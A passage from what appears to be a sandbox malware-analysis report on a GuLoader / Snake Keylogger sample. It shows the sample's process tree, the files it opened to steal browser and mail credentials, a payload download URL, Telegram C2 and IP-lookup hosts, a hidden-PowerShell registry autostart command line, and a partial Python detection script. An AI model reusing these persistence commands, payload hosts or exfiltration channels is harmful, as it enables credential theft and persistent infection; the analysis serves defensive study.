            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Contentious.exe VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Torpernes.exeCode function: 0_2_00405E3B GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00405E3B
            Source: C:\Users\user\AppData\Local\Temp\Contentious.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

Source: Yara match | File source: 00000006.00000002.2944378842.0000000021031000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2944378842.0000000021067000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2944378842.0000000020FAA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2944378842.0000000020DE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Contentious.exe PID: 7972, type: MEMORYSTR
Source: Yara match | File source: 00000006.00000002.2944378842.0000000021067000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Contentious.exe PID: 7972, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\Contentious.exe | File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: Yara match | File source: Process Memory Space: Contentious.exe PID: 7972, type: MEMORYSTR

            Remote Access Functionality

Source: Yara match | File source: 00000006.00000002.2944378842.0000000021031000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2944378842.0000000021067000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2944378842.0000000020FAA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.2944378842.0000000020DE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Contentious.exe PID: 7972, type: MEMORYSTR
Source: Yara match | File source: 00000006.00000002.2944378842.0000000021067000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Contentious.exe PID: 7972, type: MEMORYSTR
MITRE ATT&CK Matrix

Techniques flagged for this sample, listed by tactic; the number in parentheses is the count shown in the report for that technique. Tactics with no flagged technique are listed as "none flagged".

Reconnaissance: none flagged
Resource Development: none flagged
Initial Access: none flagged
Execution: Windows Management Instrumentation (1), Native API (1), Command and Scripting Interpreter (1), PowerShell (2)
Persistence: DLL Side-Loading (1), Registry Run Keys / Startup Folder (1)
Privilege Escalation: DLL Side-Loading (1), Process Injection (111), Registry Run Keys / Startup Folder (1)
Defense Evasion: Disable or Modify Tools (1), Obfuscated Files or Information (2), Software Packing (1), DLL Side-Loading (1), Masquerading (11), Modify Registry (1), Virtualization/Sandbox Evasion (41), Process Injection (111)
Credential Access: OS Credential Dumping (1)
Discovery: File and Directory Discovery (3), System Information Discovery (115), Security Software Discovery (111), Process Discovery (1), Virtualization/Sandbox Evasion (41), Application Window Discovery (1), System Network Configuration Discovery (1)
Lateral Movement: none flagged
Collection: Archive Collected Data (1), Data from Local System (1), Email Collection (1), Clipboard Data (1)
Command and Control: Web Service (1), Ingress Tool Transfer (1), Encrypted Channel (21), Non-Application Layer Protocol (3), Application Layer Protocol (14)
Exfiltration: none flagged
Impact: System Shutdown/Reboot (1)
Behavior Graph (ID: 1481480; Sample: Torpernes.exe; Start date: 25/07/2024; Architecture: WINDOWS; Score: 100)

Sample-level signatures: Found malware configuration; Yara detected GuLoader; Yara detected Telegram RAT; 3 other signatures
Contacted hosts: reallyfreegeoip.org (Tries to detect the country of the analysis system (by using the IP)); api.telegram.org (Uses the Telegram API (likely for C&C communication)); 3 other IPs or domains

Process tree:

Torpernes.exe (started)
    dropped: C:\Users\user\AppData\Local\...\Beneme56.Gem (ASCII)
    signatures: Suspicious powershell command line found
    -> powershell.exe (started)
        dropped: C:\Users\user\AppData\...\Contentious.exe (PE32); C:\Users\...\Contentious.exe:Zone.Identifier (ASCII)
        signatures: Writes to foreign memory regions; Found suspicious powershell code related to unpacking or dynamic code loading; Powershell drops PE file
        -> Contentious.exe (started)
            network: api.telegram.org 149.154.167.220, 443, 49753, TELEGRAMRU, United Kingdom; reallyfreegeoip.org 188.114.96.3, 443, 49738, 49739, CLOUDFLARENETUS, European Union; 2 other IPs or domains
            signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Switches to a custom stack to bypass stack traces
            -> cmd.exe (started)
                -> conhost.exe (started)
                -> reg.exe (started)
        -> conhost.exe (started)

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample
Source | Detection | Scanner | Label | Link
Torpernes.exe | 11% | ReversingLabs | |

Dropped Files
Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Temp\Contentious.exe | 11% | ReversingLabs | |

Unpacked PE Files
No Antivirus matches

Domains
No Antivirus matches

URLs
Source | Detection | Scanner | Label | Link
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe |
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe |
http://www.apache.org/licenses/LICENSE-2.0.html | 0% | URL Reputation | safe |
https://contoso.com/License | 0% | URL Reputation | safe |
https://contoso.com/Icon | 0% | URL Reputation | safe |
http://checkip.dyndns.org | 0% | URL Reputation | safe |
http://nsis.sf.net/NSIS_ErrorError | 0% | URL Reputation | safe |
https://reallyfreegeoip.org/xml/8.46.123.33 | 0% | URL Reputation | safe |
http://crl.m | 0% | URL Reputation | safe |
http://checkip.dyndns.org/ | 0% | URL Reputation | safe |
https://aka.ms/pscore6lB | 0% | URL Reputation | safe |
https://reallyfreegeoip.org/xml/8.46.123.33$ | 0% | URL Reputation | safe |
https://contoso.com/ | 0% | URL Reputation | safe |
https://nuget.org/nuget.exe | 0% | URL Reputation | safe |
http://reallyfreegeoip.org | 0% | URL Reputation | safe |
https://reallyfreegeoip.org | 0% | URL Reputation | safe |
http://checkip.dyndns.com | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
https://reallyfreegeoip.org/xml/ | 0% | URL Reputation | safe |
https://api.telegram.org/bot | 0% | Avira URL Cloud | safe |
https://api.telegram.org | 0% | Avira URL Cloud | safe |
https://github.com/Pester/Pester | 0% | Avira URL Cloud | safe |
https://domzeleni.kz/image/bwSNbczRiJIuD15.bin | 0% | Avira URL Cloud | safe |
https://domzeleni.kz/image/bwSNbczRiJIuD15.binB | 0% | Avira URL Cloud | safe |
https://domzeleni.kz/ | 0% | Avira URL Cloud | safe |
http://api.telegram.org | 0% | Avira URL Cloud | safe |
Domains and IPs

Contacted Domains
Name | IP | Active | Malicious | Antivirus Detection | Reputation
domzeleni.kz | 185.98.5.168 | true | false | | unknown
reallyfreegeoip.org | 188.114.96.3 | true | true | | unknown
api.telegram.org | 149.154.167.220 | true | true | | unknown
checkip.dyndns.com | 158.101.44.242 | true | false | | unknown
checkip.dyndns.org | unknown | unknown | true | | unknown
Contacted URLs
Name | Malicious | Antivirus Detection | Reputation
https://reallyfreegeoip.org/xml/8.46.123.33 | false | URL Reputation: safe | unknown
https://domzeleni.kz/image/bwSNbczRiJIuD15.bin | false | Avira URL Cloud: safe | unknown
http://checkip.dyndns.org/ | false | URL Reputation: safe | unknown
URLs from Memory and Binaries
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000001.00000002.2173904529.000000000568D000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://api.telegram.org | Contentious.exe, 00000006.00000002.2944378842.0000000021067000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000001.00000002.2171178295.0000000004776000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://api.telegram.org/bot | Contentious.exe, 00000006.00000002.2944378842.0000000021067000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000001.00000002.2171178295.0000000004776000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/License | powershell.exe, 00000001.00000002.2173904529.000000000568D000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000001.00000002.2173904529.000000000568D000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://domzeleni.kz/image/bwSNbczRiJIuD15.binB | Contentious.exe, 00000006.00000002.2928735040.0000000004A19000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://checkip.dyndns.org | Contentious.exe, 00000006.00000002.2944378842.0000000020F9C000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020EE8000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F6E000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F53000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F45000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F38000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020E99000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020EA5000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F60000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F8D000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://nsis.sf.net/NSIS_ErrorError | Torpernes.exe, Contentious.exe.1.dr | false | URL Reputation: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 00000001.00000002.2171178295.0000000004776000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.m | powershell.exe, 00000001.00000002.2177929958.0000000006E21000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://aka.ms/pscore6lB | powershell.exe, 00000001.00000002.2171178295.0000000004621000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://reallyfreegeoip.org/xml/8.46.123.33$ | Contentious.exe, 00000006.00000002.2944378842.0000000020F9C000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020EE8000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F53000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F45000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F38000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F60000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F8D000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/ | powershell.exe, 00000001.00000002.2173904529.000000000568D000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000001.00000002.2173904529.000000000568D000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://reallyfreegeoip.org | Contentious.exe, 00000006.00000002.2944378842.0000000020EBD000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F9C000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F53000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F45000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F38000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F60000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F8D000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://reallyfreegeoip.org | Contentious.exe, 00000006.00000002.2944378842.0000000020F9C000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020EE8000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F53000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F45000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F38000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020EA5000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F60000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F8D000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://checkip.dyndns.com | Contentious.exe, 00000006.00000002.2944378842.0000000020F9C000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F53000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F45000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F38000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020EA5000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F60000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020F8D000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://api.telegram.org | Contentious.exe, 00000006.00000002.2944378842.0000000021067000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000001.00000002.2171178295.0000000004621000.00000004.00000800.00020000.00000000.sdmp, Contentious.exe, 00000006.00000002.2944378842.0000000020DE1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://domzeleni.kz/ | Contentious.exe, 00000006.00000002.2928735040.0000000004A54000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://reallyfreegeoip.org/xml/ | Contentious.exe, 00000006.00000002.2944378842.0000000020EA5000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
Contacted IPs
IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | true
188.114.96.3 | reallyfreegeoip.org | European Union | 13335 | CLOUDFLARENETUS | true
158.101.44.242 | checkip.dyndns.com | United States | 31898 | ORACLE-BMC-31898US | false
185.98.5.168 | domzeleni.kz | Kazakhstan | 200532 | HOSTER-KZHosterKZ-hostinganddomainservicesinKazakhs | false
General Information

Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1481480
Start date and time: 2024-07-25 09:55:01 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 38s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 11
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Torpernes.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@11/11@4/4
EGA Information:
• Successful, ratio: 66.7%
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 179
• Number of non-executed functions: 130
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 7440 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• VT rate limit hit for: Torpernes.exe
Time | Type | Description
03:55:55 | API Interceptor | 40x Sleep call for process: powershell.exe modified
03:56:45 | API Interceptor | 108490x Sleep call for process: Contentious.exe modified
08:56:38 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run crisscrossing %Isomerous% -windowstyle minimized $Livsopsving=(Get-ItemProperty -Path 'HKCU:\Deponeringspladsen\').sknhedsplejes;%Isomerous% ($Livsopsving)
08:56:46 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run crisscrossing %Isomerous% -windowstyle minimized $Livsopsving=(Get-ItemProperty -Path 'HKCU:\Deponeringspladsen\').sknhedsplejes;%Isomerous% ($Livsopsving)
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      149.154.167.220Lisect_AVT_24003_G1B_119.exeGet hashmaliciousUnknownBrowse
                        Lisect_AVT_24003_G1B_119.exeGet hashmaliciousUnknownBrowse
                          Lisect_AVT_24003_G1B_33.exeGet hashmaliciousUnknownBrowse
                            DSD876543456780000.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                              Install.msiGet hashmaliciousUnknownBrowse
                                rPO0977-6745.exeGet hashmaliciousSnake KeyloggerBrowse
                                  z23RevisedInvoice.exeGet hashmaliciousDarkCloud, PureLog StealerBrowse
                                    Updated PI.exeGet hashmaliciousAgentTesla, RedLineBrowse
                                      rcrypt.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                        231210-06-AgentTesla-9da180.exeGet hashmaliciousAgentTeslaBrowse
                                          188.114.96.3LisectAVT_2403002B_352.exeGet hashmaliciousUnknownBrowse
                                          • avkit.org/home/getconverter/?id=4
                                          LisectAVT_2403002B_352.exeGet hashmaliciousUnknownBrowse
                                          • avkit.org/home/getconverter/?id=4
                                          https://www.trypineappledigital.agency/Get hashmaliciousUnknownBrowse
                                          • daytimeadmirable.icu/favicon.ico
                                          Quotation.xlsGet hashmaliciousRemcosBrowse
                                          • tny.wtf/jk8Z5I
                                          DRAFT AWB and DRAFT Commercial invoice.xlsGet hashmaliciousRemcosBrowse
                                          • tny.wtf/cyd
                                          S004232824113048.xlsGet hashmaliciousRemcos, DBatLoaderBrowse
                                          • wx.ax/Xm6
                                          http://comicextra.me/favicon.icoGet hashmaliciousUnknownBrowse
                                          • comicextra.org/favicon.ico
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|---|
| | AED 47,000.exe | malicious | FormBook | www.yi992.com/iuti/ |
| | QUOTATION_JULQTRA071244#U00faPDF.scr.exe | malicious | Unknown | filetransfer.io/data-package/eadkqsUM/download |
| | QUOTATION_JULQTRA071244#U00faPDF.scr.exe | malicious | Unknown | filetransfer.io/data-package/4jaIXkvS/download |
| 158.101.44.242 | DSD876543456780000.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/ |
| 158.101.44.242 | Confirmation transfer Note AGS # 22-00379.exe | malicious | GuLoader, Snake Keylogger | checkip.dyndns.org/ |
| 158.101.44.242 | rPO0977-6745.exe | malicious | Snake Keylogger | checkip.dyndns.org/ |
| 158.101.44.242 | z1QuotationSheetVSAA6656776.exe | malicious | GuLoader, Snake Keylogger | checkip.dyndns.org/ |
| 158.101.44.242 | rcrypt.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | checkip.dyndns.org/ |
| 158.101.44.242 | rRFQ_025261-97382.exe | malicious | Snake Keylogger | checkip.dyndns.org/ |
| 158.101.44.242 | SecuriteInfo.com.Exploit.CVE-2018-0798.4.16578.20925.rtf | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/ |
| 158.101.44.242 | SecuriteInfo.com.Exploit.CVE-2017-11882.123.25886.26681.rtf | malicious | Snake Keylogger | checkip.dyndns.org/ |
| 158.101.44.242 | List & Sample_Doc3.exe | malicious | GuLoader, Snake Keylogger | checkip.dyndns.org/ |
| 158.101.44.242 | Apixaban - August 2024.XLS.exe | malicious | Snake Keylogger | checkip.dyndns.org/ |
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
|---|---|---|---|---|
| reallyfreegeoip.org | Confirmation Order.js | malicious | Snake Keylogger | 188.114.97.3 |
| reallyfreegeoip.org | DSD876543456780000.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.97.3 |
| reallyfreegeoip.org | Deye Union - PO # 23081377.exe | malicious | Snake Keylogger | 188.114.97.3 |
| reallyfreegeoip.org | rPO0977-6745.exe | malicious | Snake Keylogger | 188.114.97.3 |
| reallyfreegeoip.org | z1QuotationSheetVSAA6656776.exe | malicious | GuLoader, Snake Keylogger | 172.67.177.134 |
| reallyfreegeoip.org | rcrypt.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 188.114.96.3 |
| reallyfreegeoip.org | SecuriteInfo.com.Exploit.CVE-2018-0798.4.16578.20925.rtf | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3 |
| reallyfreegeoip.org | Purchase Order POT-247110.scr.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3 |
| reallyfreegeoip.org | SecuriteInfo.com.Trojan.PackedNET.2944.2376.13684.exe | malicious | Snake Keylogger | 188.114.96.3 |
| reallyfreegeoip.org | SecuriteInfo.com.Exploit.CVE-2017-11882.123.25886.26681.rtf | malicious | Snake Keylogger | 188.114.96.3 |
| checkip.dyndns.com | Confirmation Order.js | malicious | Snake Keylogger | 132.226.247.73 |
| checkip.dyndns.com | DSD876543456780000.exe | malicious | Snake Keylogger, VIP Keylogger | 158.101.44.242 |
| checkip.dyndns.com | Confirmation transfer Note AGS # 22-00379.exe | malicious | GuLoader, Snake Keylogger | 158.101.44.242 |
| checkip.dyndns.com | Deye Union - PO # 23081377.exe | malicious | Snake Keylogger | 132.226.247.73 |
| checkip.dyndns.com | rPO0977-6745.exe | malicious | Snake Keylogger | 158.101.44.242 |
| checkip.dyndns.com | z1QuotationSheetVSAA6656776.exe | malicious | GuLoader, Snake Keylogger | 158.101.44.242 |
| checkip.dyndns.com | rcrypt.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 158.101.44.242 |
| checkip.dyndns.com | rRFQ_025261-97382.exe | malicious | Snake Keylogger | 158.101.44.242 |
| checkip.dyndns.com | SecuriteInfo.com.Exploit.CVE-2018-0798.4.16578.20925.rtf | malicious | Snake Keylogger, VIP Keylogger | 132.226.247.73 |
| checkip.dyndns.com | Purchase Order POT-247110.scr.exe | malicious | Snake Keylogger, VIP Keylogger | 132.226.247.73 |
| domzeleni.kz | ndplanernes.exe | malicious | GuLoader, Snake Keylogger | 185.98.5.168 |
| domzeleni.kz | Bespot.exe | malicious | GuLoader, Snake Keylogger | 185.98.5.168 |
| api.telegram.org | Lisect_AVT_24003_G1B_119.exe | malicious | Unknown | 149.154.167.220 |
| api.telegram.org | Lisect_AVT_24003_G1B_119.exe | malicious | Unknown | 149.154.167.220 |
| api.telegram.org | Lisect_AVT_24003_G1B_33.exe | malicious | Unknown | 149.154.167.220 |
| api.telegram.org | DSD876543456780000.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220 |
| api.telegram.org | Install.msi | malicious | Unknown | 149.154.167.220 |
| api.telegram.org | rPO0977-6745.exe | malicious | Snake Keylogger | 149.154.167.220 |
| api.telegram.org | z23RevisedInvoice.exe | malicious | DarkCloud, PureLog Stealer | 149.154.167.220 |
| api.telegram.org | Updated PI.exe | malicious | AgentTesla, RedLine | 149.154.167.220 |
| api.telegram.org | rcrypt.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger | 149.154.167.220 |
| api.telegram.org | 231210-06-AgentTesla-9da180.exe | malicious | AgentTesla | 149.154.167.220 |
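The domain table above shows the network pattern this family shares with the other Snake Keylogger samples: an external-IP / geolocation lookup (checkip.dyndns.org, checkip.dyndns.com, reallyfreegeoip.org; the report's "Tries to detect the country of the analysis system" signature) followed by traffic to api.telegram.org for exfiltration. The detection below is an added example written for this page, not Joe Sandbox tooling; the proxy-log format, the host names, the time window and the log lines themselves are constructed assumptions, only the domain names come from the table.

```python
"""
Flag hosts that perform an IP-lookup request and then contact api.telegram.org
within a short window (the Snake Keylogger check-in sequence seen in the
context table).  Added example; log format and window are assumptions.
"""
from datetime import datetime, timedelta

# Domains taken from the context table on this page.
IP_LOOKUP_DOMAINS = {"checkip.dyndns.org", "checkip.dyndns.com", "reallyfreegeoip.org"}
EXFIL_DOMAIN = "api.telegram.org"

# Constructed proxy log: "<ISO timestamp> <client host> <destination domain>".
# WS-0042 shows the full sequence; WS-0017 only talks to Telegram (a legitimate
# bot, say); WS-0099 does the lookup but reaches Telegram 45 minutes later.
SAMPLE_LOG = """\
2024-07-24T09:00:01 WS-0042 checkip.dyndns.org
2024-07-24T09:00:02 WS-0042 reallyfreegeoip.org
2024-07-24T09:00:05 WS-0042 api.telegram.org
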